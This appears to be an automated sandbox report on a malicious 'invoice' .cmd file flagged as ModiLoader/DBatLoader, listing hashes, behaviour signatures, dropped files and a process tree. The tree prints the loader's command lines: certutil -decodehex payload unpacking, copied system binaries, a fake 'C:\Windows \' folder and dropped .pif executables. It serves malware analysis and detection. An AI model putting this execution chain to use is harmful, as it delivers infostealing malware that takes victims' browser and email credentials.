Overview

overview

10

Static

static

1

invoice_20...94.cmd

windows7-x64

10

invoice_20...94.cmd

windows10-2004-x64

10

Analysis

  • max time kernel
    148s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240220-en
  • resource tags

    arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
  • submitted
    20-06-2024 06:40

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    invoice_2024-05-6577588494.cmd

  • Size

    3.5MB

  • MD5

    ba2debbaec427ab4f654bccbe788d836

  • SHA1

    2d0543aebec81e87cfbf8862060d73c4c7dac196

  • SHA256

    94513f7783348cf8d403be267ab537ba7f4e02a215f28b90675b853d93b79948

  • SHA512

    d4a0c89b0d749a1deb3b2cf47b235854fe6811c5c3e9826cc1ddf057b8ff19845a8f279cedc47b70f575e616114b4cf850cda359cd18e71efbb07dcc4a808d50

  • SSDEEP

    49152:GA6PFw42qcCUt5GKGhqK6GgCYUMCJwUzun28HMA:r

Score
10/10
modiloaderpersistencespywarestealertrojan

Malware Config

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

    trojanmodiloader
  • ModiLoader Second Stage 2 IoCs
  • Executes dropped EXE 11 IoCs
  • Loads dropped DLL 9 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 53 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\invoice_2024-05-6577588494.cmd"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1620
    • C:\Windows\System32\extrac32.exe
      C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
      2⤵
        PID:2172
      • C:\Users\Public\alpha.exe
        C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
        2⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:1672
        • C:\Windows\system32\extrac32.exe
          extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
          3⤵
            PID:3052
        • C:\Users\Public\alpha.exe
          C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\invoice_2024-05-6577588494.cmd" "C:\\Users\\Public\\Audio.mp4" 9
          2⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:2524
          • C:\Users\Public\kn.exe
            C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\invoice_2024-05-6577588494.cmd" "C:\\Users\\Public\\Audio.mp4" 9
            3⤵
            • Executes dropped EXE
            PID:2596
        • C:\Users\Public\alpha.exe
          C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Audio.mp4" "C:\\Users\\Public\\Libraries\\Audio.pif" 12
          2⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:2620
          • C:\Users\Public\kn.exe
            C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Audio.mp4" "C:\\Users\\Public\\Libraries\\Audio.pif" 12
            3⤵
            • Executes dropped EXE
            PID:2788
        • C:\Users\Public\Libraries\Audio.pif
          C:\Users\Public\Libraries\Audio.pif
          2⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Adds Run key to start application
          • Suspicious use of SetThreadContext
          • Suspicious behavior: CmdExeWriteProcessMemorySpam
          • Suspicious use of WriteProcessMemory
          PID:2784
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c mkdir "\\?\C:\Windows "
            3⤵
              PID:2328
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c mkdir "\\?\C:\Windows \System32"
              3⤵
                PID:2308
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c "C:\\Windows \\System32\\cmd.pif"
                3⤵
                  PID:2640
                  • C:\Windows \System32\cmd.pif
                    "C:\\Windows \\System32\\cmd.pif"
                    4⤵
                    • Executes dropped EXE
                    PID:2636
                  • C:\Windows \System32\cmd.pif
                    "C:\Windows \System32\cmd.pif"
                    4⤵
                    • Executes dropped EXE
                    PID:2100
                • C:\Windows\SysWOW64\extrac32.exe
                  C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\Audio.pif C:\\Users\\Public\\Libraries\\Hpxrnjzr.PIF
                  3⤵
                    PID:1676
                  • C:\Users\Public\Libraries\rzjnrxpH.pif
                    C:\Users\Public\Libraries\rzjnrxpH.pif
                    3⤵
                    • Executes dropped EXE
                    • Adds Run key to start application
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2152
                • C:\Users\Public\alpha.exe
                  C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
                  2⤵
                  • Executes dropped EXE
                  PID:1652
                • C:\Users\Public\alpha.exe
                  C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Audio.mp4" / A / F / Q / S
                  2⤵
                  • Executes dropped EXE
                  PID:2764

              Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Public\Audio.mp4
                Filesize

                2.6MB

                MD5

                2f6760ed95e0a93dba8419dc5eabccbf

                SHA1

                139239677e8a572c8caef3ce393737557756a172

                SHA256

                6f322e181418d95f5a9fc12f9adbc5728b6173ac7b19b7bf8e346bfcce57c8bc

                SHA512

                5ad72622de9d5b829a9c974a0b4f9b630ada38bce5d87b2e231f447b544f9da081be28073f844d595e9611d24824e772ff1dc602ec1a576be0105ee406bda81f

                Download Submit

              • C:\Users\Public\Libraries\Audio.pif
                Filesize

                1.3MB

                MD5

                a38702206e839d7a2fed5dbbdf91d689

                SHA1

                fd6477a5f7e81692ec8b8c245f2681ea5e2f24e5

                SHA256

                f73eb6fb2423ef07681da6c0a3033faec6e645f23e561d7ede802a7c2c07ea0c

                SHA512

                c285a1c70f08fe3205855513ef620888d2789f7f59837705948ace71338813db5b122533f7a613dc445319551f464e3937ef4f9408a79e6a88874d88e7b6e2e1

                Download Submit

              • C:\Windows \System32\cmd.pif
                Filesize

                94KB

                MD5

                869640d0a3f838694ab4dfea9e2f544d

                SHA1

                bdc42b280446ba53624ff23f314aadb861566832

                SHA256

                0db4d3ffdb96d13cf3b427af8be66d985728c55ae254e4b67d287797e4c0b323

                SHA512

                6e775cfb350415434b18427d5ff79b930ed3b0b3fc3466bc195a796c95661d4696f2d662dd0e020c3a6c3419c2734468b1d7546712ecec868d2bbfd2bc2468a7

                Download Submit

              • \Users\Public\Libraries\rzjnrxpH.pif
                Filesize

                182KB

                MD5

                3776012e2ef5a5cae6935853e6ca79b2

                SHA1

                4fc81df94baaaa550473ac9d20763cfb786577ff

                SHA256

                8e104cc58e62de0eab837ac09b01d30e85f79045cc1803fa2ef4eafbdbd41e8d

                SHA512

                38811cb1431e8b7b07113ae54f1531f8992bd0e572d9daa1029cf8692396427285a4c089ffd56422ca0c6b393e9fca0856a5a5cd77062e7e71bf0a670843cfb8

                Download Submit

              • \Users\Public\alpha.exe
                Filesize

                337KB

                MD5

                5746bd7e255dd6a8afa06f7c42c1ba41

                SHA1

                0f3c4ff28f354aede202d54e9d1c5529a3bf87d8

                SHA256

                db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386

                SHA512

                3a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e

                Download Submit

              • \Users\Public\kn.exe
                Filesize

                1.1MB

                MD5

                ec1fd3050dbc40ec7e87ab99c7ca0b03

                SHA1

                ae7fdfc29f4ef31e38ebf381e61b503038b5cb35

                SHA256

                1e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3

                SHA512

                4e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2

                Download Submit

              • memory/2152-133-0x0000000025D10000-0x0000000025D64000-memory.dmp

                Filesize

                336KB

                Download

              • memory/2152-125-0x0000000025D10000-0x0000000025D64000-memory.dmp

                Filesize

                336KB

                Download

              • memory/2152-78-0x0000000000400000-0x0000000001400000-memory.dmp

                Filesize

                16.0MB

                Download

              • memory/2152-82-0x0000000025B30000-0x0000000025B8C000-memory.dmp

                Filesize

                368KB

                Download

              • memory/2152-83-0x0000000025D10000-0x0000000025D6A000-memory.dmp

                Filesize

                360KB

                Download

              • memory/2152-101-0x0000000025D10000-0x0000000025D64000-memory.dmp

                Filesize

                336KB

                Download

              • memory/2152-85-0x0000000025D10000-0x0000000025D64000-memory.dmp

                Filesize

                336KB

                Download

              • memory/2152-84-0x0000000025D10000-0x0000000025D64000-memory.dmp

                Filesize

                336KB

                Download

              • memory/2152-121-0x0000000025D10000-0x0000000025D64000-memory.dmp

                Filesize

                336KB

                Download

              • memory/2152-143-0x0000000025D10000-0x0000000025D64000-memory.dmp

                Filesize

                336KB

                Download

              • memory/2152-141-0x0000000025D10000-0x0000000025D64000-memory.dmp

                Filesize

                336KB

                Download

              • memory/2152-139-0x0000000025D10000-0x0000000025D64000-memory.dmp

                Filesize

                336KB

                Download

              • memory/2152-137-0x0000000025D10000-0x0000000025D64000-memory.dmp

                Filesize

                336KB

                Download

              • memory/2152-135-0x0000000025D10000-0x0000000025D64000-memory.dmp

                Filesize

                336KB

                Download

              • memory/2152-131-0x0000000025D10000-0x0000000025D64000-memory.dmp

                Filesize

                336KB

                Download

              • memory/2152-129-0x0000000025D10000-0x0000000025D64000-memory.dmp

                Filesize

                336KB

                Download

              • memory/2152-127-0x0000000025D10000-0x0000000025D64000-memory.dmp

                Filesize

                336KB

                Download

              • memory/2152-80-0x0000000000400000-0x0000000001400000-memory.dmp

                Filesize

                16.0MB

                Download

              • memory/2152-123-0x0000000025D10000-0x0000000025D64000-memory.dmp

                Filesize

                336KB

                Download

              • memory/2152-119-0x0000000025D10000-0x0000000025D64000-memory.dmp

                Filesize

                336KB

                Download

              • memory/2152-117-0x0000000025D10000-0x0000000025D64000-memory.dmp

                Filesize

                336KB

                Download

              • memory/2152-115-0x0000000025D10000-0x0000000025D64000-memory.dmp

                Filesize

                336KB

                Download

              • memory/2152-113-0x0000000025D10000-0x0000000025D64000-memory.dmp

                Filesize

                336KB

                Download

              • memory/2152-111-0x0000000025D10000-0x0000000025D64000-memory.dmp

                Filesize

                336KB

                Download

              • memory/2152-109-0x0000000025D10000-0x0000000025D64000-memory.dmp

                Filesize

                336KB

                Download

              • memory/2152-107-0x0000000025D10000-0x0000000025D64000-memory.dmp

                Filesize

                336KB

                Download

              • memory/2152-105-0x0000000025D10000-0x0000000025D64000-memory.dmp

                Filesize

                336KB

                Download

              • memory/2152-103-0x0000000025D10000-0x0000000025D64000-memory.dmp

                Filesize

                336KB

                Download

              • memory/2152-99-0x0000000025D10000-0x0000000025D64000-memory.dmp

                Filesize

                336KB

                Download

              • memory/2152-97-0x0000000025D10000-0x0000000025D64000-memory.dmp

                Filesize

                336KB

                Download

              • memory/2152-95-0x0000000025D10000-0x0000000025D64000-memory.dmp

                Filesize

                336KB

                Download

              • memory/2152-93-0x0000000025D10000-0x0000000025D64000-memory.dmp

                Filesize

                336KB

                Download

              • memory/2152-91-0x0000000025D10000-0x0000000025D64000-memory.dmp

                Filesize

                336KB

                Download

              • memory/2152-89-0x0000000025D10000-0x0000000025D64000-memory.dmp

                Filesize

                336KB

                Download

              • memory/2152-87-0x0000000025D10000-0x0000000025D64000-memory.dmp

                Filesize

                336KB

                Download

              • memory/2784-34-0x0000000000400000-0x0000000000552000-memory.dmp

                Filesize

                1.3MB

                Download